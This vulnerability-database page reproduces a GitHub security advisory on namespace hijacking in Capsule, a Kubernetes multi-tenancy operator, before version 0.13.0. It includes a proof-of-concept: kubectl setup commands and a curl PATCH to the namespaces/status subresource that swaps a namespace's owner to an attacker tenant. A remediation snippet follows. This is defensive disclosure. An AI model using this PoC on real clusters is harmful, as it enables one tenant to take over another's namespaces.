What is GHSA-2ww6-hf35-mfjm?

GHSA-2ww6-hf35-mfjm is a security advisory published by GitHub Security Advisories with Low severity. Capsule Namespace Hijacking via subresource

Which CVE IDs does GHSA-2ww6-hf35-mfjm cover?

GHSA-2ww6-hf35-mfjm covers the following CVE IDs: CVE-2026-30963. Each CVE has its own detail page on EchelonGraph Pulse with the synthesized EG score.

What is the CVSS v3 score of GHSA-2ww6-hf35-mfjm?

GHSA-2ww6-hf35-mfjm has a CVSS v3 base score of 3.9, published by GitHub Security Advisories.

Which products are affected by GHSA-2ww6-hf35-mfjm?

GHSA-2ww6-hf35-mfjm affects 1 product, including: go/github.com/projectcapsule/capsule:\u003c 0.13.0.

GHSA-2ww6-hf35-mfjmLowCVSS 3.9

Capsule Namespace Hijacking via subresource

Vendor

GitHub Security Advisories

Published

May 28, 2026

Last Modified

May 28, 2026

🔗 CVE IDs covered (1)

CVE-2026-30963 →

📋 Description

Summary

To defend against namespace hijacking achieved through update/patch operations on namespaces, Capsule uses a webhook to validate update requests targeting namespaces. However, in Kubernetes, the namespace/finalize and namespace/status subresource APIs can also modify various fields of a namespace, including the metadata field. The webhook does not define interception rules for these subresources. As a result, if a tenant administrator has permission to modify namespace/status or namespace/finalize, they can successfully perform namespace hijacking.

Details

When Capsule uses a ValidatingWebhookConfiguration to intercept changes to namespace resources, it does not intercept modification requests initiated through namespace subresource APIs (see: https://github.com/projectcapsule/capsule/blob/main/charts/capsule/templates/validatingwebhookconfiguration.yaml#L193). Through subresource APIs, it is still possible to modify the metadata field of a namespace resource, enabling hijacking.

PoC

Open two terminals and create two tenants:

kubectl create -f - << EOF
apiVersion: capsule.clastix.io/v1beta2
kind: Tenant
metadata:
  name: oil
spec:
  owners:
  - name: alice
    kind: User
EOF

./hack/create-user.sh alice solar
export KUBECONFIG=alice-solar.kubeconfig
kubectl create namespace solar-production # alice creates the namespace

kubectl create -f - << EOF
apiVersion: capsule.clastix.io/v1beta2
kind: Tenant
metadata:
  name: attacker
spec:
  owners:
  - name: attacker
    kind: User
EOF

./hack/create-user.sh attacker attacker
export KUBECONFIG=attacker-attacker.kubeconfig

When the attacker has permission to modify namespace/status or namespace/finalize, they can hijack other namespaces. Here we grant the attacker the relevant permissions:

kubectl create clusterrole status --verb=patch --resource=namespaces/status
kubectl create clusterrolebinding status --clusterrole=status --user=attacker

The attacker then sends a PATCH request to namespace/status to hijack the namespace created by alice:

curl -k --cert ./attacker-attacker.crt --key attacker-attacker.key --request PATCH 'https://192.168.201.12:6443/api/v1/namespaces/solar-production/status' \
--header 'Content-Type: application/json-patch+json' \
--data '[
    {
      "op": "replace",
      "path": "/metadata/ownerReferences",
      "value": [
        {
          "apiVersion": "capsule.clastix.io/v1beta2",
            "kind": "Tenant",
            "name": "attacker",
            "uid": "1fcb9c9b-b552-4974-a248-32be66a2188c"
        }
      ]
    }
  ]'

Impact

hijack namespace

Remediation

To mitigate this issue, add the following two subresources to the resources list in the ValidatingWebhookConfiguration rules:

    resources:
    - namespaces
    - namespaces/status
	- namespace/finalize

🎯 Affected products1

go/github.com/projectcapsule/capsule:< 0.13.0